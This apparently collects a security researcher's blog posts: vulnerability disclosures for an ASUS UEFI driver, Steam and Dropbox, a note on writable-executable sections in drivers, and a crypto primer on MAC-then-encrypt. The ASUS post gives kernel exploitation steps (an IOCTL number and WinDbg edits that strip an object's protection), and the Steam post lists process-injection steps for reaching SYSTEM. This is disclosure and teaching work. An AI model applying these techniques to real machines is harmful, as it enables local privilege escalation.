ASUS UEFI Update Driver Physical Memory Read/Write

A short while ago, slipstream/RoL dropped an exploit for the ASUS memory mapping driver (ASMMAP/ASMMAP64) which was vulnerable to complete physical memory access (read/write) to unprivileged users, allowing for local privilege escalation and all sorts of other problems. An aside to this was that there were also IOCTLs available to perform direct I/O operations (in/out instructions) directly from unprivileged usermode, which had additional interesting impacts for messing with system firmware without triggering AV heuristics.

When the PoC was released, I noted that I’d reported this to ASUS a while beforehand, later clarifying that I’d actually reported it to them in March 2015. To be fair to ASUS, they were initially very responsive via email, and particularly via Twitter DM on the @ASUSUK account, and it seems like they had some bad luck with both the engineer working on the fixes and the customer support advisor handling my tickets leaving the company, resulting in a significant delay in the triage and patch processes. However, promises to keep me in the loop were not kept, and I was always chasing them up for answers.

In addition to the ASMMAP bugs, I also reported the exact same bugs in their UEFI update driver (AsUpIO.sys). This driver is deployed as part of the usermode UEFI update toolset, and exposes almost identical functionality which (as slipstream/RoL pointed out) is likely from an NT3.1 example driver that was written long before Microsoft took steps to segregate malicious users from physical memory in any meaningful way.

One additional piece of functionality which I believe was missed from the original ASMMAP vulnerability release was the ability to read/write Model Specific Registers (MSRs) as an unprivileged user. This was, again, a function exposed as an IOCTL in the driver. For those of you not versed in MSRs, they’re implementation-specific registers which contain control and status values for the processor and supporting components (e.g. SMM). You can read more about them in chapter 35 of the Intel 64 Architecture Software Developer’s Manual Volume 3. MSRs are particularly powerful registers in that they offer the ability to enable or disable all sorts of internal functionality on the processor, and are at least theoretically capable of bricking hardware if you abuse them in the wrong way. One of the most interesting MSRs is the Extended Feature Enable Register (EFER) at index 0xC0000080, which contains the No-eXecute Enable (NXE) and Secure Virtual Machine Enable (SVME) bits. Switching the NXE bit off on a live VM in VirtualBox crashes the VM with a “Guru Mediation” error (there’s an age cutoff on people who will get that reference), which I suppose is a novel anti-VM trick on its own, not to mention the intended behaviour of switching off NX on real-steel hardware.

Rather than just providing you with a bit of PoC code, I thought I’d take the opportunity to go through exactly how I discovered the bugs and what approach I took towards reliable exploitation.

Generally speaking, Windows drivers have a number of interfaces through which usermode code may communicate with them. The most important are I/O Request Packets (IRPs), which are sent to a driver when code performs a particular operation on the driver’s device object. The exposed functions which IRPs are sent to are known as Major Functions, examples of which include open, close, read, write, and I/O control (otherwise known as IOCTL). The descriptor structure for a driver object contains an array of function pointers, each pointing to a dispatch function for a major function. These are fantastic targets for bug-hunting in drivers, since they’re usermode-accessible (and often accessible from non-admin accounts) and can often result in local privilege escalation to kernelmode.

The first key thing to look for is whether or not the driver object is accessible as a low-privilege user. It’s all well and good finding a bug which gets you kernel code execution, but if you’ve got to be an admin to exploit it it’s a bit of a non-issue. When a driver goes through its initialisation steps, it usually names itself and creates a device object using the IoCreateDevice API, and a symbolic link to the DosDevices object directory using the IoCreateSymbolicLink API. An example is as follows:

    PDEVICE_OBJECT pDeviceObject = NULL;
    UNICODE_STRING driverName, dosDeviceName;
    RtlInitUnicodeString(&driverName, L"\\Device\\Example");
    RtlInitUnicodeString(&dosDeviceName, L"\\DosDevices\\Example"); 
    status = IoCreateDevice(pDriverObject, 0,
                            FALSE, &pDeviceObject);
    // ...
    IoCreateSymbolicLink(&dosDeviceName, &driverName);
    // ...
    return status;

In order to check whether or not the driver’s device object is accessible by low-privilege users, we need to know what name it picked for itself. There are a few approaches to this: we could debug the system and breakpoint on the IoCreateDevice API; we could reverse engineer the driver using a tool such as IDA; or we could simply extract all the strings from the binary and look for any that start with “\\Device\\”.

In the case of AsUpIO.sys, dropping it into IDA shows that it does exactly the above, using the name “AsUpdateio”:


This now tells us exactly what we should be looking for. In order to inspect the device object and view its discretionary access control list (DACL), we can use WinObj.


As we can see here, the Everyone group is given both Read, Write, and Special permissions, allowing the device object to be directly interacted with from low-privilege usermode. Note that these ACEs are not set by the driver; this is a somewhat “hardened” permissions set applied by an up-to-date Windows 10 install, although it is still accessible by everyone. In Windows 8 and earlier, setting a the DACL to null simply results in it having no ACEs, allowing everyone complete access, unless you apply a hardened security policy. This is because, prior to Win10, the root object namespace had no inheritable ACEs.

The snippet above also gives us the address of the HandleIoControl function which is assigned to handle the Create, Close, and IOCTL major functions. Reverse engineering this shows the IOCTL number which is used for mapping memory:


(note: the ASUS_MemMap name was set by me; I renamed it after analysing each function in this set of branches to work out their functions)

Since we now have control over the driver, we now want to exploit the bugs. In this case the IOCTL for doing the memory mapping is 0xA040244Ch, which can be found by reverse engineering the HandleIoControl routine we found above. Just as in the original slipstream/RoL exploit, this IOCTL can be used to map any physical memory section to usermode. The downside, from an exploitation perspective, is that the function covers a wide range of potential memory locations, including addresses where the HAL has to translate to bus addresses rather than the usual physical memory. This is fine if we know a specific location we want to map and access, but it becomes a bit fraught if we want to read through all of physical memory; trying to map and read an area of memory reserved for certain hardware might crash or lock up the system, and that’s not much use for a privesc.

The approach I took was to find a specific location in kernel memory which I knew was safe, then map and read that, and use that single operation to gain the ability to reliably read memory over the lifetime of the system. The ideal object to gain control over is \\Device\PhysicalMemory, as this gives us direct usermode access to the physical memory. The first hurdle is that we need a kernel pointer leak to identify the physical address of that object’s descriptor.

First, we want to know what processes have a handle to this object. By running Process Explorer as and administrator (we don’t need to do this in an actual attack scenario), we can see that the System process keeps a handle to it open:


Using an undocumented feature of the NtQuerySystemInformation API, i.e. the SystemHandleInformation information class, we can pull out information about every single handle open on the system. The returned structure for each handle looks like the following:

    DWORD    dwProcessId;
    BYTE     bObjectType;
    BYTE     bFlags;
    WORD     wValue;
    PVOID    pAddress;
    DWORD    GrantedAccess;

The pAddress field points to the kernel memory address of the object’s descriptor. By enumerating through all open handles on the system and checking for dwProcessId=4 (i.e. the System process) and bObjectType matching the object type ID of a section (this is different between Windows version), we can find all the sections open by the System process, one of which we know will be \\Device\\PhysicalMemory. In fact, System only has three handles open to sections in Windows 10, so we can just give ourselves access to all of them and not worry too much.

Of course, now that we have the address of the section descriptor in kernel memory, we still need to actually take control of that section object somehow. Let’s take a look at the header structure for the object, 0x30 bytes before the section descriptor, in WinDbg:

0: kd> dt nt!_OBJECT_HEADER 0xffffc001`cca13bd0-0x30
   +0x000 PointerCount     : 0n65537
   +0x008 HandleCount      : 0n2
   +0x008 NextToFree       : 0x00000000`00000002 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x23 '#'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x2 ''
   +0x01b Flags            : 0x16 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y1
   +0x01b KernelOnlyAccess : 0y1
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y1
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Spare            : 0x5000000
   +0x020 ObjectCreateInfo : 0x00000000`00000001 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0x00000000`00000001 Void
   +0x028 SecurityDescriptor : 0xffffc001`cca12273 Void
   +0x030 Body             : _QUAD

Now, remember earlier when I said that having a DACL set to null gives everyone access? The SecurityDescriptor field here is, in fact, exactly what gets set to null in such a situation. If we overwrite the field with zeroes, then (theoretically) everyone has access to the object. However, this object is a special case: it has the KernelOnlyAccess flag set. This means that no usermode processes can gain a handle to it. We need to switch this off too, so we set the Flags field to 0x10 to keep the PermenantObject flag but clear the rest:

0: kd> eb (0xffffc001`cca13bd0-0x30)+0x1b 0x10
0: kd> eq (0xffffc001`cca13bd0-0x30)+0x28 0
0: kd> dt nt!_OBJECT_HEADER 0xffffc001`cca13bd0-0x30
   +0x000 PointerCount     : 0n65537
   +0x008 HandleCount      : 0n2
   +0x008 NextToFree       : 0x00000000`00000002 Void
   +0x010 Lock             : _EX_PUSH_LOCK
   +0x018 TypeIndex        : 0x23 '#'
   +0x019 TraceFlags       : 0 ''
   +0x019 DbgRefTrace      : 0y0
   +0x019 DbgTracePermanent : 0y0
   +0x01a InfoMask         : 0x2 ''
   +0x01b Flags            : 0x10 ''
   +0x01b NewObject        : 0y0
   +0x01b KernelObject     : 0y0
   +0x01b KernelOnlyAccess : 0y0
   +0x01b ExclusiveObject  : 0y0
   +0x01b PermanentObject  : 0y1
   +0x01b DefaultSecurityQuota : 0y0
   +0x01b SingleHandleEntry : 0y0
   +0x01b DeletedInline    : 0y0
   +0x01c Spare            : 0x5000000
   +0x020 ObjectCreateInfo : 0x00000000`00000001 _OBJECT_CREATE_INFORMATION
   +0x020 QuotaBlockCharged : 0x00000000`00000001 Void
   +0x028 SecurityDescriptor : (null) 
   +0x030 Body             : _QUAD

Now the KernelOnlyAccess and SecurityDescriptor fields are zeroed out, we can gain access to the object from usermode as a non-adminstrative user:


In a real exploitation scenario we’d do these edits via the driver bug rather than WinDbg, mapping the page containing the object header and writing to it directly.

Disabling the flags and clearing the security descriptor allows us to map the PhysicalMemory object into any process and use it to gain further control over the system, without worrying about the weird intricacies of how the driver handles certain addresses. This can be done by scanning for EPROCESS structures within memory and identifying one, then jumping through the linked list to find your target process and a known SYSTEM process (e.g. lsass), then duplicating the Token field across to elevate your process. This part isn’t really that novel or interesting, so I won’t go into it here.

One tip I will mention is that you can make the exploitation process much more reliable if you set your process’ priority as high as possible and spin up threads which perform tight loops to keep the processor busy doing nothing, while you mess with memory. This helps keep kernel threads and other process threads from being scheduled as frequently, making it less likely for you to hit a race condition and bugcheck the machine. I only saw this happen once during the hundred or so debugging sessions I did, so it’s not critical, but still worth keeping in mind.

In closing, I hope the teardown of this bug and my exploitation process has been useful to you. While you certainly can directly exploit the bug, it’s not without potential peril, and it’s often safer to pivot to a more stable approach.

Take-home points for security people and driver developers in general:

  • WHQL does not mean the code is secure, nor does it even mean the code is stable or safe. Microsoft happily signed a number of these drivers with vulnerability-as-a-feature code within them. These bugs were trivially identifiable; this indicates that WHQL is likely an automated process to ensure adherence to little more than a “don’t use undocumented / unsupported functions” requirement.
  • Ensure that appropriate DACLs are placed on objects, particularly the device object, via the use of IoCreateDeviceSecure and the Attributes parameters to Create* calls (e.g. CreateMutex, CreateEvent, CreateSemaphore). A null DACL mean anyone can access the object.
  • Drivers should not expose administrative functionality (e.g. UEFI updates) to non-administrative users (e.g. the Everyone group). Ensure that object DACLs reflect this.

Take-home points for ASUS:

  • Implement a security contact mailbox as per the guidance in RFC2142 and ensure that it is checked and managed by someone versed in security. Create a page on your website which lists this contact and outlines your expectations from researchers when reporting security issues.
  • Your Twitter support staff are better at communicating with customers than your support ticket people. You could stand to learn from their more informal and responsive model.
  • Ensure that anything assigned to someone who leaves the company is appropriately reassigned with guidance from that individual. This should help ensure that patches don’t end up delayed by 15 months.
  • Get your code assessed by a 3rd party security contractor before releasing it to customers, and ensure that your developers are given appropriate training on secure development practices. The vulnerable code used was likely copied from examples into a number of your drivers, which indicates that problems may be widespread.

Disclosure timeline:

  • 24th March 2015 – Submitted bug as ticket to ASUS (WTM20150324082900771)
  • 25th March 2015 – Acknowledgement from ASUS
  • 25th March 2015 – Sent reply email with additional information.
  • 27th March 2015 – Reply from “J” from ASUS, says engineer has a fix and is liasing with their own security researcher on the matter.
  • < I forgot about the issue for a long time >
  • 4th September 2015 – Sent email to query status of the issue.
  • 7th September 2015 – Reply from “Anthony” from ASUS, informing me that the agent I’d been interacting with before had left the company, asking for more details on the issue.
  • 7th September 2015 – Sent a response with another full report of the issue.
  • 21st September 2015 – No reply, sent a request for a status update.
  • 22nd September 2015 – Contacted @ASUSUK on Twitter. Had conversation via DM trying to get a status update.
  • 28th September 2015 – Chased up @ASUSUK for an update.
  • 29th September 2015 – Reply informing me that the HQ office in Taipei was closed due to a typhoon.
  • 7th October 2015 – Sent another chase-up message to @ASUSUK.
  • 7th October 2015 – Reply from them; no updates from the office but a promise to let me know when the patch is out.
  • 25th November 2015 – Another chase-up DM to @ASUSUK.
  • 25th November 2015 – HQ were offline, told I’d get a reply the next day. No reply came.
  • 9th May 2016 – Still nothing back from ASUS via email or Twitter, sent another chase-up email and DM informing my intent to disclose within 28 days due to the long delays in releasing.
  • 10th May 2016 – Told that Anthony is OOO until Monday.
  • 12th May 2016 – Told that the delays were due to the project leader at HQ leaving, they’re trying to source someone to fix it and push a fix out ASAP.
  • 12th May 2016 – Sent reply asking to be kept in the loop. ASUS replies saying they’ll keep me informed.
  • 12th June 2016 – Disclosed.

Vulnerable file details:

  • MD5: 1392B92179B07B672720763D9B1028A5
  • SHA1: 8B6AA5B2BFF44766EF7AFBE095966A71BC4183FA
  • Signing certificate serial number: ‎12 d5 c9 e2 94 9d 48 ab ac cd 35 14 f0 fb 22 ad

W^X policy violation affecting all Windows drivers compiled in Visual Studio 2013 and previous

Back in June, I was doing some analysis on a Windows driver and discovered that the INIT section had the read, write, and executable characteristics flags set. Windows executables (drivers included) use these flags to tell the kernel what memory protection flags should be applied to that section’s pages once the contents are mapped into memory. With these flags set, the memory pages become both writable and executable, which violates the W^X policy, a concept which is considered good security practice. This is usually considered a security issue because it can give an attacker a place to write arbitrary code when staging an exploit, similar to how pre-NX exploits used to use the stack as a place to execute shellcode.

While investigating these section flags in the driver, I also noticed a slightly unusual flag was set: the DISCARDABLE flag. Marking a section as discardable in user-mode does nothing; the flag is meaningless. In kernel-mode, however, the flag causes the section’s pages to be unloaded after initialisation completes. There’s not a lot of documentation around this behaviour, but the best resource I discovered was an article on Raymond Chen’s “The Old New Thing” blog, which links off to some other pages that describe the usage and behaviour in various detail. I’d like to thank Hans Passant for giving me some pointers here, too. The short version of the story is that the INIT section contains the DriverEntry code (think of this like the ‘main()’ function of a driver), and it is marked as discardable because it isn’t used after the DriverEntry function returns. From gathering together scraps of information on this behaviour, it seems to be that the compiler does this because the memory that backs the DriverEntry function must be pageable (though I’m not sure why), but any driver code which may run at IRQLs higher than DISPATCH_LEVEL must not try to access any memory pages that are pageable, because there’s no guarantee that the OS can service the memory access operation. This is further evidenced by the fact that the CODE section of drivers is always flagged with the NOT_PAGED characteristic, whereas INIT is not. By discarding the INIT section, there can be no attempt to execute this pageable memory outside of the initialisation phase. My understanding of this is incomplete, so if anyone has any input on this, please let me know.

The DISCARDABLE behaviour means that the window of exploitation for targeting the memory pages in the INIT section is much smaller – a vulnerability must be triggered during the initialisation phase of a driver (before the section is discarded), and that driver’s INIT section location must be known. This certainly isn’t a vulnerability on its own (you need at least a write-what-where bug to leverage this) but it is also certainly bad practice.

Here’s where things get fun: in order to compare the driver I was analysing to a “known good” sample, I looked into some other drivers I had on my system. Every single driver I investigated, including ones that are core parts of the operating system (e.g. win32k.sys), had the same protection flags. At this point I was a little stumped – perhaps I got something wrong, and the writable flag is needed for some reason? In order to check this, I manually cleared the writable flag on a test driver, and loaded it. It worked just fine, as did several other test samples, from which I can surmise that it is superfluous. I also deduced that this must be a compiler (or linker) issue, since both Microsoft drivers and 3rd party drivers had the same issue. I tried drivers compiled with VS2005, VS2010, and VS2013, and all seemed to be affected, meaning that pretty much every driver on Windows Vista to Windows 8.1 is guaranteed to suffer from this behaviour, and Windows XP drivers probably do too.

INIT section of ATAPI Driver from Windows 8.1

While the target distribution appears to be pretty high, the only practical exploitation path I can think of is as follows:

  1. Application in unprivileged usermode can trigger a driver to be loaded on demand.
  2. Driver leaks a pointer (e.g. via debug output) during initialisation which can be used to determine the address of DriverEntry in memory.
  3. A write-what-where bug in another driver or in the kernel that is otherwise very difficult to exploit (e.g. due to KASLR, DEP, KPP, etc.) is triggered before the DriverEntry completes.
  4. Bug is used to overwrite the end of the DriverEntry function.
  5. Arbitrary code is executed in kernel.

This is a pretty tall order, but there are some things that make it more likely for some of the conditions to arise. First, since any driver can be used (they all have INIT marked as RWX) you only need to find one that you can trigger from unprivileged usermode. Ordinarily the race condition between step 1 and step 4 would be difficult to hit, but if the DriverEntry calls any kind of synchronisation routine (e.g. ZwWaitForSingleObject) then things get a lot easier, especially if the target sync object happens to have a poor or missing DACL, allowing for manipulation from unprivileged usermode code. These things make it a little easier, but it’s still not very likely.

Since I was utterly stumped at this point as to why drivers were being compiled in this way, I decided to contact Microsoft’s security team. Things were all quiet on that front for a long time; aside from an acknowledgement, I actually only heard back from yesterday (2015/09/03). To be fair to them, though, it was a complicated issue and even I wasn’t very sure as to its impact, and I forgot all about it until their response email.

Their answer was as follows:

After discussing this issue internally, we have decided that no action will be taken at this time. I am unable to allocate more resources to answer your questions more specifically, but we do thank you for your concern and your commitment to computer security.

And I can’t blame them. Exploiting this issue would need a powerful attack vector already, and even then it’d be pretty rare to find the prerequisite conditions. The only thing I’m a bit bummed about is that they couldn’t get anyone to explain how it all works in full.

But the story doesn’t end there! In preparation for writing this blog post, I opened up a couple of Microsoft’s drivers on my Windows 10 box to refresh my memory, and found that they no longer had the execute flag set on the INIT section. It seems that Microsoft probably patched this issue in Visual Studio 2015, or in a hotfix for previous versions, so that it no longer happens. Makes me feel all warm and fuzzy inside. I should note, however, that 3rd party drivers such as Nvidia’s audio and video drivers still have the same issue, which implies that they haven’t been recompiled with a version of Visual Studio that contains the fix. I suspect that many vendor drivers will continue to have this issue.

I asked Microsoft whether it had been fixed in VS2015, but they wouldn’t comment on the matter. Since I don’t have a copy of VS2015 yet, I can’t verify my suspicion that they fixed it.

In closing, I’d like to invite anyone who knows more than me about this to provide more information about how/why the INIT section is used and discarded. If you’ve got a copy of VS2015 and can build a quick Hello World driver to test it out, I’d love to see whether it has the RWX issue on INIT.

Disclosure timeline:

  • 29th June 2015 – Discovered Initial driver bug
  • 30th June 2015 – Discovered wider impact (all drivers affected)
  • 2nd July 2015 – Contacted Microsoft with report / query
  • 2nd July 2015 – Microsoft replied with acknowledgement
  • 6th July 2015 – Follow-up email sent to Microsoft
  • [ mostly forgot about this, so I didn’t chase it up ]
  • 3rd September 2015 – Microsoft respond (see above)
  • 3rd September 2015 – Acknowledgement email sent to Microsoft, querying fix status
  • 4th September 2015 – Microsoft respond, will not comment on fix status
  • 4th September 2015 – Disclosed

Steam Code Execution – Privilege Escalation to SYSTEM (Part 2)

In my previous post I talked about a vulnerability in Steam which allows you to bypass UAC. I’m going to be totally transparent here: I fucked up. I wrote the draft post a few days back, then did some more work on the vulnerability. I discovered something much more serious in the process. I posted last night’s blog post at 1am, tired as hell, and in my sleep-deprived state I completely neglected to update it properly, and there are several mistakes and bits of missing information. The draft went out and confused a lot of people. So, for that, I apologise. I’m going to leave it there so people can see it, because it’ll remind me not to do that next time.

Now, onto the real impact of the vulnerability: I can leverage it to gain code execution as SYSTEM. How? Well, it turns out that Steam.exe gives itself one unusual privilege – the privilege to debug other processes. This is called SeDebugPrivilege and one of its features is that it allows the process to bypass access control lists (ACLs) on processes when you call OpenProcess, i.e. the process can open a handle to any process it likes, with any privilege it likes.

Here’s how you can elevate to SYSTEM when you have SeDebugPrivilege:

  1. Open a handle to a process that is running as SYSTEM, with PROCESS_ALL_ACCESS as the access flag.
  2. Use VirtualAllocEx to allocate a block of memory in the remote process, with the executable flag set.
  3. Use WriteProcessMemory to copy a block of shellcode into that memory buffer.
  4. Use CreateRemoteThread to create a new thread in the remote process, whose start address is the base address of the memory allocation.
  5. Bingo! You just got a privesc to SYSTEM.

In this case, once you’ve got code execution inside Steam, you can utilise this trick to escalate yourself to SYSTEM. There’s your privesc vuln.

Steam UAC bypass via code execution

Like many other gamers, I love Steam. Not only is it ridiculously convenient, but it’s also become a pretty awesome platform for indie game developers to get their games out there. It provides a online store platform for 54 million users, and most of the time it does an excellent job. That’s partly the reason why I’m so frustrated with Valve right now.

I spent a good few hours playing with a bug I found in Steam, and then made an effort to provide Valve with a clear, concise, detailed security vulnerability notification. Their response has been one of pure opacity, with not a single ounce of professional courtesy.

On Tuesday 17th September 2013, I submitted a vulnerability report to Valve, the full text of which follows:

I have discovered a vulnerability within the Steam client application that allows for arbitrary memory copies to be initiated within the Steam process. These issues can be triggered at multiple crash sites, and range in severity from unexploitable crash (denial of service) to full compromise of the process.

Technical details:

The shared memory section GameOverlayRender_PIDStream_mem-IPCWrapper does not have an ACL applied to it, so any user may open a handle to it with all privileges. This is especially important in multi-user systems such as terminal services, or in situations where other potentially risky processes are sandboxed into other user accounts within the same session.

By opening a handle to the section and writing random garbage data, then signalling the Steam3Master_SharedMemLock wait handle (which also does not have an ACL) it is possible to cause the Steam client to crash. I have discovered multiple locations where the crash may occur, and many are within REP MOVS copy instructions. In some cases it is possible to control the destination address (EDI), the source address (ESI), and/or the memory at the target site of ESI. In some cases other general purpose registers were modified. By carefully crafting a payload, it would certainly be possible to cause code execution via heap corruption, e.g. by overwriting a callback pointer. Despite the use of ASLR and DEP on the process, certain modules (e.g. Steam.dll, steamclient.dll, CSERHelper.dll) are not marked as ASLR supporting. It is possible to use a technique called Return Orientated Programming (ROP) to bypass ASLR and DEP in cases such as this, where there are non-ASLR modules loaded into the process.

I have created a proof of concept application, which can be provided upon request, though it should be trivial for a developer to discover the source of the vulnerabilities.


The fix I would propose is that an appropriate explicit ACL is set on the afforementioned objects, enforcing that only the user that created the Steam process can access the object. Additionally, I would recommend that proper bounds and sanity checking is enforced on the shared memory object. Furthermore, it would be prudent to ensure that memory copy operations (e.g. memcpy) are performed using SDL approved functions, such as memcpy_s.

Responsible disclosure policy:

This ticket serves as initial notification of a security issue. Please respond within 30 days, detailing your acceptance or rejection of the report, the proposed mitigation (if any), and patch timescale. If no satisfactory response is received within 30 days, it will be assumed that you do not consider the issues in this report to constitute a security issue, and they will be publicly disclosed. My normal public disclosure timescale is 90 days after initial notification, but this can be extended upon reasonable request. Most importantly, please remember that this is an invitation to work with me to help improve your product and increase the security posture of your customers. Should you require further information about the issue, or any other aspects of this notification, please contact me.

Thank you.

On Sunday 22nd of September 2013, after further pondering the issue, I provided this addendum to the report:

Impact update:

On further consideration, the impact of this issue is not exactly as described above. Due to the location of the shared memory section object within the object manager hierarchy, it is not accessible across sessions unless the reading process is running in an administrative context. This negates any cross-session privilege escalation, so one user session cannot directly attack another in this manner.

However, an additional impact has been discovered. If the attacking process runs in the same session as the user (e.g. malware) and waits for Steam to escalate its privileges to an administrative context via User Account Control (UAC), it may then exploit the vulnerability and gain UAC escalation. This completely bypasses the UAC process and could allow local malware to jump from a limited or guest user context to a full administrative context. Not only is this directly problematic for home users, but it becomes significantly important for domain environments where workstation security is enforced by group policy, which is bypassable via the administrative security context.

I feel that this new impact scenario is more significant, since it targets the most common configuration of Steam, i.e. a single-session machine.

As noted before, please feel free to contact me if you have any questions. For absolute clarity, the cut-off point for non-responsiveness is the 17th of October 2013, i.e. 30 days after initial notification. Please respond before then as per the responsible disclosure policy detailed above.

Thank you.

I recognise that this isn’t exactly an earth-shattering vulnerability, as UAC isn’t “officially” a privilege segregation. That said, it’s significant enough to warrant fixing, especially as it results in memory corruption. Furthermore, I’m sure someone could find a way to utilise the issue in a much more interesting way than I did.

A Valve employee under the name of “Support Tech Alex” responded the next day, apologising for the delay and informing me that the details would be forwarded to the appropriate department. Excellent, I thought. I thanked him, and waited. A week passed, then two. Still no response.

On Wednesday 9th October, I discovered that they had closed the ticket. I asked why, and their response was as follows:

Hello Graham,

Unfortunately, you will not receive a notification about any action taken as a result of this report.

If you have a business related inquiry, please visit

If you have any further difficulty, please let us know.

This annoys me, and I think it demonstrates a fundamental lack of understanding of whitehats on Valve’s part. In my opinion and experience, what drives a whitehat isn’t a lust for rewards, or free swag, or even being thanked by the company (though that is nice). What drives a whitehat is the quest for technical knowledge, and the satisfaction of having helped fixed a security issue. When a vendor cuts a whitehat out of the loop, and leaves them hanging without even saying whether they’re going to look into it, it kills all motivation. Not only is it unprofessional, but it’s also downright rude to reward a person’s hard work with little more than contempt.

I didn’t go into this expecting Valve to pay me or even send me a T-shirt for finding the bug. I did, however, at least expect to get something along the lines of “thanks, we’ll fix that, should get pushed out in the couple of months”. Instead what I got was opacity and avoidance, and that’s not the way to deal with security notifications. Hopefully a public shaming will do you some good, Valve. Treat whitehats well, and you’ll do well. Treat whitehats badly, and you might find that they take their reports elsewhere.

Update: In my sleep-deprived state last night, I forgot to update this draft before publishing it. There’s actually a much bigger vulnerability here: Steam gives itself SeDebugPrivilege, which allows it to bypass ACLs on OpenProcess calls, meaning it can inject code into any other process on the system, including those running as SYSTEM. It’s a full privesc. I’ve written a follow-up post that explains this in more detail.

Installing Dropbox? Prepare to lose ASLR.

Dropbox has become a daily part of my life. I rely on it to synchronise data between my growing set of devices. But how much of an impact does it have on the security of my system? I decided to find out by digging around in exactly what it does to my machine, or more specifically, the processes running on it.

The first thing I want to check out is what modules are loaded into various processes. Tools like Dropbox like to extend the functionality of other programs using shell extensions, which are nothing more than specially designed DLLs loaded into process memory. Let’s see what we’ve got…

Dropbox Files

Interesting! Looks like we’ve got two extension DLLs, one 32-bit and one 64-bit. These are likely used to add extra context menu options when right-clicking on files. Now let’s find out where they get injected. For this, we’ll use good ol’ trusty Process Explorer. By going to Find » Find Handle or DLL, we can search for the DLLs in running processes.

Dropbox DLL Injection

It looks like it’s being loaded into processes that have windows created, which implies it’s probably an AppInit DLL, but it turns out not to be the case – the registry key doesn’t contain that DLL. This implies that there’s something more active going on, and that Dropbox actively selects which processes to inject into. I may be mistaken here, I’m not sure. Either way, though, it’s a little odd that it chose to inject into Notepad++ and other innocuous processes.

(Update: thanks to zeha and 312c on Reddit for pointing out that it’s likely injected via the standard file browser shell, due to the Dropbox icon in the favourites list)

The biggest problem becomes clear when you take a look at the module in a running process. In this case, it’s Firefox:

Dropbox in Firefox

Notice that the Dropbox extension DLL doesn’t have the ASLR flag set. This means that any vulnerability in Firefox becomes a lot easier to exploit, since the Dropbox module provides an unrandomised anchor for a ROP chain. Ignore PowerHookMenu.dll here – I’m aware of that issue and have notified the developer, but it’s infrequently seen on people’s machines so it’s not so bad.

Let’s just quickly verify that the DLL isn’t ASLR enabled at all, by checking the DLL characteristics flags in the file…

ASLR disabled for DLL

Definitely not enabled.

Anyway, the take-away issue here is that Dropbox arbitrarily injects an ASLR-disabled DLL into various 32-bit and 64-bit processes, causing significant degradation in the efficacy of ASLR across the entire system. With no ASLR, an attacker could craft an exploit payload that utilises executable code within the injected DLL to product a ROP chain, leading to code execution. This is significantly problematic in high-risk programs like web browsers and torrent clients.

I notified Dropbox of this back when version was the latest version, but got not response. I’ve since tried again, but had no luck. I’m hoping that going public will give them the kick they need to get it fixed. In the meantime, a good mitigation is to install EMET and set a policy to enforce Mandatory ASLR. All of this was re-tested against Dropbox 2.0.22, with versions of both the 32-bit and 64-bit DLLs. The operating system used was Windows 7 x64 SP1.

Update: Brad “spender” Spengler (of grsec fame) has noted that the latest version of Dropbox has ASLR enabled for the 64-bit DLL, but still doesn’t on 32-bit.

Update 2: Dropbox responds: “Our engineers are aware of this issue and actively working on fixing it. Unfortunately, I can’t give you an exact timeline that a fix will become available. If you have any additional questions or concerns please let me know.”

Update 3: @_sinn3r has done some awesome work on the exploitability of these issues, over at Metasploit. Definitely worth a read.

A quick crypto lesson – why “MAC then encrypt” is a bad choice

In light of the numerous recent attacks against SSL, I thought I’d offer up a quick and simple crypto lesson about why MAC-then-encrypt schemes are bad. This post will require only a minimum of knowledge about cryptography, so hopefully it’ll be useful to a wide range of people.

This is not designed to be a full and detailed description of how SSL works, or how various attacks against it works, but rather a short primer on the subject for those who know a bit about crypto but don’t really understand how something as seemingly strong as SSL might be broken. Some parts have been generalised or simplified for brevity and ease of understanding, so please don’t take anything I say here as a literal description of how it all works.

Anyway, let’s get started…

A secure network protocol has two main jobs:

  1. Keep the information in the conversation completely confidential.
  2. Prevent an attacker from tampering with the conversation.

The first part, as you probably already know, is performed by encryption. This usually involves exchanging one or more secret session keys between two endpoints, then using them with a cipher of some kind in order to provide safety against eavesdroppers.

The second part is a little more involved. In this case, when I say “tampering with the conversation”, I mean forging packets that look like they came from a legitimate endpoint, in such a way that they have a meaningful effect on the security of the conversation. This part is often implemented via a Message Authentication Code (MAC), which verifies that all data received was in fact sent by an authorised endpoint. Usually, a HMAC hash will be used, which is a keyed version of a cryptographic hash function. By using the session key as the key for the HMAC hash, it is possible to produce a hash of the payload in a way that cannot be forged by anyone that does not know the session key. By computing the same HMAC hash on the receiving end, using the same session key, it is possible to verify the authenticity of the data.

However, there’s a catch. One implementation option, called MAC-then-encrypt, is to compute the MAC on the plaintext data, then encrypt the data. The receiving endpoint then decrypts the data using the session key, and verifies its authenticity. Unfortunately, this means that an unauthenticated attacker can send arbitrary messages, and the receiving endpoint must decrypt them first in order to verify the MAC. Without knowing the session key, the attacker will likely produce garbage data after decryption, and the MAC will not match.

There is, however, an interesting trick that can be done here. Block ciphers require the length of all plaintext messages to be a multiple of the cipher’s block size. Since there is often a length discrepancy, padding is used to ensure that the message length is extended to fit. There are many different algorithms for generating padding data, but the padding is usually reliant on the plaintext in some way. This padding is checked during the decryption phase, and invalid padding results in an error. An attacker can flip certain bits in the ciphertext to modify this padding, and identify changes in behaviour and timing based on these altered bits. This is called a padding oracle attack, and can lead to full discovery of the plaintext.

A better solution, called encrypt-then-MAC, is to encrypt the data first, then compute the MAC of the ciphertext. This leads to a situation where the receiving endpoint checks the MAC first, before performing decryption, and drops the connection if the MAC is incorrect. Since the attacker can’t forge the MAC without knowing the session key, this completely negates the padding oracle attack.

How is all of this relevant to SSL? Well, in TLS 1.0 and earlier, a MAC-then-encrypt scheme was used. This resulted in various attacks, including BEAST and Lucky 13. In TLS 1.1 and later, these types of attacks are prevented.

Hopefully this has given you some insight into one of the ways that SSL can be vulnerable.

Password cracking with VMware Authentication Daemon

